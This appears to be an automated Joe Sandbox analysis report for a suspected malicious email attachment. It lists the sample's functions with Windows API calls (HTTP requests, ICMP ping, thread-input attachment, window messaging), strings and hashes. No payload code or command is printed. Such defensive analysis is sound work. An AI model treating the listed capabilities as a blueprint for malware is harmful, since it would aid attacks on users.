                                                                                                          • Opcode Fuzzy Hash: ea7609c4b1e4535e2ba37a069b80428a070f67ba7d64f34fc368a43e3352bfe6
                                                                                                          • Instruction Fuzzy Hash: 8D616971900208EFDB11DFA8CC81EEE77B8EF49710F10416AFA14AB3A1D775A941CBA0
                                                                                                          Function 007A6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007A6BBF
                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 007A6C18
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007A6C2A
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 007A6C4A
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 007A6C9D
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 007A6CB1
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007A6CC6
                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 007A6CD3
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A6CDC
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007A6CEE
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A6CF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2706829360-0
                                                                                                          • Opcode ID: 2284a30db7ae96ce67acdd333c02db5dd3012813b124022e50c4ae7fc243c442
                                                                                                          • Instruction ID: 5ea3fd0849bcd54c10f2ee98d6d41d9828334b340e768964610ce7e1e7aca706
                                                                                                          • Opcode Fuzzy Hash: 2284a30db7ae96ce67acdd333c02db5dd3012813b124022e50c4ae7fc243c442
                                                                                                          • Instruction Fuzzy Hash: 9E415175A00219DFCF00DF64D8489AEBBB9EF49350F04C169E956E7261DB38A945CFA0
                                                                                                          Function 007C5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 007C5793
                                                                                                          • inet_addr.WSOCK32(?,?,?), ref: 007C57D8
                                                                                                          • gethostbyname.WSOCK32(?), ref: 007C57E4
                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 007C57F2
                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5862
                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5878
                                                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007C58ED
                                                                                                          • WSACleanup.WSOCK32 ref: 007C58F3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                          • String ID: Ping
                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                          • Opcode ID: 57533ded21f76f88def2b214cd8c30c3b950c11c177aff9cc078480f343400b9
                                                                                                          • Instruction ID: db41180ee566af4d6fdc421add7f7f7a10ea4202ed092fa26e32255a16832409
                                                                                                          • Opcode Fuzzy Hash: 57533ded21f76f88def2b214cd8c30c3b950c11c177aff9cc078480f343400b9
                                                                                                          • Instruction Fuzzy Hash: 9B515C31604700DFDB109F24DC49F6A77E4AB48720F04852EF956DB2A1DB79F884DB41
                                                                                                          Function 007BB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007BB4D0
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007BB546
                                                                                                          • GetLastError.KERNEL32 ref: 007BB550
                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 007BB5BD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                          • API String ID: 4194297153-14809454
                                                                                                          • Opcode ID: 8724b4e50e86ff9f8ce494f5df7d623af95db93ce6c4d5d6624d8da4fe8f80f3
                                                                                                          • Instruction ID: ae4c7155f4ac6e66f085fa21f49d13187bee83e3e3004acf91aa3a37810fce7c
                                                                                                          • Opcode Fuzzy Hash: 8724b4e50e86ff9f8ce494f5df7d623af95db93ce6c4d5d6624d8da4fe8f80f3
                                                                                                          • Instruction Fuzzy Hash: FD318D35A00209DFCB20EB68CC99BEDB7B4FF04311F148126F901D7291DBB9AA56CB52
                                                                                                          Function 007A8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007A9014
                                                                                                          • GetDlgCtrlID.USER32 ref: 007A901F
                                                                                                          • GetParent.USER32 ref: 007A903B
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A903E
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 007A9047
                                                                                                          • GetParent.USER32(?), ref: 007A9063
                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9066
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 1536045017-1403004172
                                                                                                          • Opcode ID: d02d2dc0b463ae73ac8ddebaf9109a12d1038f700ddbdf19eed5aa7aa7eac892
                                                                                                          • Instruction ID: fa8f9c4d03b3f3b95dbaaa55ed1a7aa3266e2bd904da638a7e558d0fda92f49b
                                                                                                          • Opcode Fuzzy Hash: d02d2dc0b463ae73ac8ddebaf9109a12d1038f700ddbdf19eed5aa7aa7eac892
                                                                                                          • Instruction Fuzzy Hash: 4D219470A00105BBDF049B60CC89EFEB774EB85310F108216F961972E1DB7D9419DA24
                                                                                                          Function 007A907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
                                                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007A90FD
                                                                                                          • GetDlgCtrlID.USER32 ref: 007A9108
                                                                                                          • GetParent.USER32 ref: 007A9124
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9127
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 007A9130
                                                                                                          • GetParent.USER32(?), ref: 007A914C
                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A914F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 1536045017-1403004172
                                                                                                          • Opcode ID: 44012d1f724969c5bbe014f4fc54fa1af28f980da601b97c428f95677b94882d
                                                                                                          • Instruction ID: 29f5c746cc3d4ab9716ffa7dd46b1abb9110f14c32d358eac18fade20ad44e9b
                                                                                                          • Opcode Fuzzy Hash: 44012d1f724969c5bbe014f4fc54fa1af28f980da601b97c428f95677b94882d
                                                                                                          • Instruction Fuzzy Hash: CC21A474A00109FBDF15ABA4CC89EFEBB74EF49300F108116F911972A1DB7D9519DB24
                                                                                                          Function 007A9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32 ref: 007A916F
                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 007A9184
                                                                                                          • _wcscmp.LIBCMT ref: 007A9196
                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007A9211
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                          • API String ID: 1704125052-3381328864
                                                                                                          • Opcode ID: f9cc3c05398a3c163194371ba54d23017190337f97601151be6c705ab027990d
                                                                                                          • Instruction ID: 917b138e302f5d763abc3b1116552e34fdd11992ab49a1618b4ed3792d66c626
                                                                                                          • Opcode Fuzzy Hash: f9cc3c05398a3c163194371ba54d23017190337f97601151be6c705ab027990d
                                                                                                          • Instruction Fuzzy Hash: D9110A36648307F9FA112624DC0EEA73B9CFB56760B204126FA24E44D2FEAD68625594
                                                                                                          Function 007B7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 007B7A6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafeVartype
                                                                                                          • String ID:
                                                                                                          • API String ID: 1725837607-0
                                                                                                          • Opcode ID: c5d0a526f950509a824d455d8c40a27caf7062574e57f4d37a30dbc5b00b07aa
                                                                                                          • Instruction ID: a94f41a3a69fb887debbd8eaa166fad238ed3e84e87f1902485f167ca4bdf87a
                                                                                                          • Opcode Fuzzy Hash: c5d0a526f950509a824d455d8c40a27caf7062574e57f4d37a30dbc5b00b07aa
                                                                                                          • Instruction Fuzzy Hash: 54B16F71904219DFDB14DFA4C885BFEBBB8EF89321F244429E941E7251D778E941CBA0
                                                                                                          Function 007B11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 007B11F0
                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007B0268,?,00000001), ref: 007B1204
                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 007B120B
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0268,?,00000001), ref: 007B121A
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 007B122C
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0268,?,00000001), ref: 007B1245
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0268,?,00000001), ref: 007B1257
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007B0268,?,00000001), ref: 007B129C
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007B0268,?,00000001), ref: 007B12B1
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007B0268,?,00000001), ref: 007B12BC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2156557900-0
                                                                                                          • Opcode ID: 03991d7ba1e812c945364890cbf995920dfe34d81cd6e0b79951c1cb6ab36420
                                                                                                          • Instruction ID: a1e39778aabe25224b75a48deb8329287c977060c9739b6934e251edaed5422d
                                                                                                          • Opcode Fuzzy Hash: 03991d7ba1e812c945364890cbf995920dfe34d81cd6e0b79951c1cb6ab36420
                                                                                                          • Instruction Fuzzy Hash: F1318D75701204BBDB10DF54EC98BEA77BEFF59311F918126F901C61A0EB789E418B64
                                                                                                          Function 0075FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0075FAA6
                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 0075FB45
                                                                                                          • UnregisterHotKey.USER32(?), ref: 0075FC9C
                                                                                                          • DestroyWindow.USER32(?), ref: 007945D6
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0079463B
                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00794668
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                          • String ID: close all
                                                                                                          • API String ID: 469580280-3243417748
                                                                                                          • Opcode ID: 07de0297355225762ea93d3d7079823e7672bbc367f76dc758ce2246f5e8f161
                                                                                                          • Instruction ID: 16db613f86096549af010aa056d3d467b315c1e3686061e433005ff0e78aec91
                                                                                                          • Opcode Fuzzy Hash: 07de0297355225762ea93d3d7079823e7672bbc367f76dc758ce2246f5e8f161
                                                                                                          • Instruction Fuzzy Hash: CEA17E70701212CFCB19EF14D999EA9F364BF05701F5482ADED0AAB261DB78AD16CF90
                                                                                                          Function 007C9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$_memset
                                                                                                          • String ID: ,,~$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                          • API String ID: 2862541840-1439926319
                                                                                                          • Opcode ID: 2198e2d0159187d56eecedf29e9eca8bbfb9b1f35f9b0cc73bb8ee4461aafb9e
                                                                                                          • Instruction ID: a07b42a16fd641d2c15f61e575e4dbcd0c8f90695a386776aec1753d3bc4fde4
                                                                                                          • Opcode Fuzzy Hash: 2198e2d0159187d56eecedf29e9eca8bbfb9b1f35f9b0cc73bb8ee4461aafb9e
                                                                                                          • Instruction Fuzzy Hash: 64916A71A00219EBDF64DFA5C848FAEBBB8EF45710F10815DFA15AB280D7789945CBA0
                                                                                                          Function 007AA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnumChildWindows.USER32(?,007AA439), ref: 007AA377
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChildEnumWindows
                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                          • API String ID: 3555792229-1603158881
                                                                                                          • Opcode ID: b12335f083956ba3184308b8a706caf6923312ed85c0bc614b5a941e5bdc0d46
                                                                                                          • Instruction ID: f16a582e4ffcbe417f9a235a15f6f8df6d62928e33d5a7f56d3aefe892d27d2c
                                                                                                          • Opcode Fuzzy Hash: b12335f083956ba3184308b8a706caf6923312ed85c0bc614b5a941e5bdc0d46
                                                                                                          • Instruction Fuzzy Hash: 2C91B431A00606FACF08DFA0C446BEEFB74FF85340F54C219D859A7191DB3969A9DBA1
                                                                                                          Function 00752E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00752EAE
                                                                                                            • Part of subcall function 00751DB3: GetClientRect.USER32(?,?), ref: 00751DDC
                                                                                                            • Part of subcall function 00751DB3: GetWindowRect.USER32(?,?), ref: 00751E1D
                                                                                                            • Part of subcall function 00751DB3: ScreenToClient.USER32(?,?), ref: 00751E45
                                                                                                          • GetDC.USER32 ref: 0078CD32
                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0078CD45
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0078CD53
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0078CD68
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0078CD70
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0078CDFB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                          • String ID: U
                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                          • Opcode ID: 96e2be540e6325173903efb2daa563b7025defd575773e15b9c36b65278a8e1d
                                                                                                          • Instruction ID: 2b0bf049db3ab864c5f867ea52497abbb0387e00a7784d74509522f9aa2134ba
                                                                                                          • Opcode Fuzzy Hash: 96e2be540e6325173903efb2daa563b7025defd575773e15b9c36b65278a8e1d
                                                                                                          • Instruction Fuzzy Hash: 3A71D231500205DFCF26AF64CC89AEA7BB5FF49321F18827AED555A2A6C7388C45DB70
                                                                                                          Function 007C1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C1A50
                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007C1A7C
                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007C1ABE
                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007C1AD3
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C1AE0
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007C1B10
                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 007C1B57
                                                                                                            • Part of subcall function 007C2483: GetLastError.KERNEL32(?,?,007C1817,00000000,00000000,00000001), ref: 007C2498
                                                                                                            • Part of subcall function 007C2483: SetEvent.KERNEL32(?,?,007C1817,00000000,00000000,00000001), ref: 007C24AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 2603140658-3916222277
